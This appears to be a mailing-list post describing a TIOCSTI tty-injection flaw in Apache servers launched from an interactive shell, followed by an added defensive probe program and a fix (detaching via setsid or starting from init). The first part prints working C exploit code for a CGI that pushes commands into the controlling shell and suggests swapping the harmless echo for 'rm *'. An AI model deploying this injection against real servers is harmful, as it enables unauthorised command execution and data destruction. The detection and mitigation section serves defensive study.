Yes, Apache closes fds 0, 1 and 2 (well, reopens them to /dev/null), but retains the controlling tty - this can be accessed via opening /dev/tty. The controlling tty is a process property that is separate from the fds it has open, and allows certain ioctl powers on any fd matching that. A 'ps' listing will show the controlling tty of each process - you'll notice that most servers have '?', but apache will have something of the form 'pts/n' or 'ttyn' so long as the shell that spawned it is still open. This is the sample exploit code:
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/ioctl.h>
    #include <termios.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        /* Command line to inject into the controlling tty's input queue. */
        const char *fake = "echo lol you got owned\n";
        const char *fake_ptr = fake;

        (void)argc;
        (void)argv;

        /* /dev/tty always resolves to this process's controlling tty,
         * even though fds 0-2 have been redirected to /dev/null. */
        int pts = open("/dev/tty", O_RDONLY);
        if (pts < 0) {
            perror("open /dev/tty");
            return 1;
        }

        /* TIOCSTI pushes one byte at a time into the tty's input queue,
         * exactly as if it had been typed at the keyboard. */
        while (*fake_ptr != '\0') {
            ioctl(pts, TIOCSTI, fake_ptr);
            fake_ptr++;
        }
        close(pts);
        return 0;
    }

Install it as a local user's CGI (I've verified this under suexec at least), and have the webserver run it. If the shell that ran the apache init script is still open, it will actually execute the command and echo out "lol you got owned". Substitute this for rm * as you see fit.

Richard
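As an added example (not part of Richard's post, and not Apache code), here is the check a practitioner would want on the other side of this: does a process that has had fds 0-2 redirected still reach its controlling tty through /dev/tty, and does detaching from the session close that door. The program probes /dev/tty in a forked child after applying one of two detachment methods, setsid() (what a proper daemonizer does before the service starts) or an explicit TIOCNOTTY ioctl. It is Linux-specific, the function and enum names are my own, and it does not use TIOCSTI itself; whether the host kernel still permits unprivileged TIOCSTI at all is a separate assumption (newer Linux kernels can turn it off via the dev.tty.legacy_tiocsti sysctl).

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Detachment methods tried by the probe (names are mine). */
enum { KEEP_TTY = 0, DETACH_SETSID = 1, DETACH_TIOCNOTTY = 2 };

/* Probe: 1 if /dev/tty can be opened (controlling tty still reachable, so a
 * TIOCSTI injection is possible), 0 if open() fails with ENXIO (no controlling
 * tty), -1 for any other error (e.g. ENOENT when /dev/tty is absent in a
 * container). O_NOCTTY makes sure the probe never acquires a tty itself. */
int can_open_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDONLY | O_NOCTTY);
    if (fd >= 0) {
        close(fd);
        return 1;
    }
    return errno == ENXIO ? 0 : -1;
}

/* Drop the controlling tty with the requested method. Returns 0 on success,
 * -1 on failure. KEEP_TTY is a no-op baseline for comparison. */
int detach_controlling_tty(int method)
{
    switch (method) {
    case KEEP_TTY:
        return 0;
    case DETACH_SETSID:
        /* A new session starts with no controlling tty. setsid() fails with
         * EPERM for a process group leader, which is why daemons fork first. */
        return setsid() == (pid_t)-1 ? -1 : 0;
    case DETACH_TIOCNOTTY: {
        /* Explicitly disassociate from the tty this process currently holds.
         * For a non-session-leader this just clears the tty, no SIGHUP. */
        int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
        if (fd < 0)
            return errno == ENXIO ? 0 : -1;   /* nothing to detach from */
        int rc = ioctl(fd, TIOCNOTTY);
        close(fd);
        return rc;
    }
    default:
        return -1;
    }
}

/* Apply `method` in a forked child and run the probe there, so the caller's
 * own session is untouched. Returns the child's probe result:
 * 1 = tty still reachable, 0 = no controlling tty, -1 = error. */
int probe_in_child(int method)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach_controlling_tty(method) != 0)
            _exit(3);
        int r = can_open_controlling_tty();
        _exit(r == 1 ? 1 : r == 0 ? 0 : 2);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    switch (WEXITSTATUS(status)) {
    case 0: return 0;
    case 1: return 1;
    default: return -1;
    }
}

int main(void)
{
    static const char *names[] = { "no detach", "setsid()", "TIOCNOTTY" };
    for (int m = KEEP_TTY; m <= DETACH_TIOCNOTTY; m++) {
        int r = probe_in_child(m);
        printf("%-10s: /dev/tty %s\n", names[m],
               r == 1 ? "still reachable (TIOCSTI injection possible)"
               : r == 0 ? "not reachable (ENXIO)" : "error");
    }
    return 0;
}
```

Run it from an interactive shell and the "no detach" line reports the tty as reachable while the two detached variants report ENXIO; run it from a service started by init with no tty and all three report ENXIO. The same fork-then-setsid() sequence, done once before exec'ing the server, is the fix the post implies: start Apache from init rather than from a shell, or at least through setsid/nohup, so there is no controlling tty for a CGI to inject into.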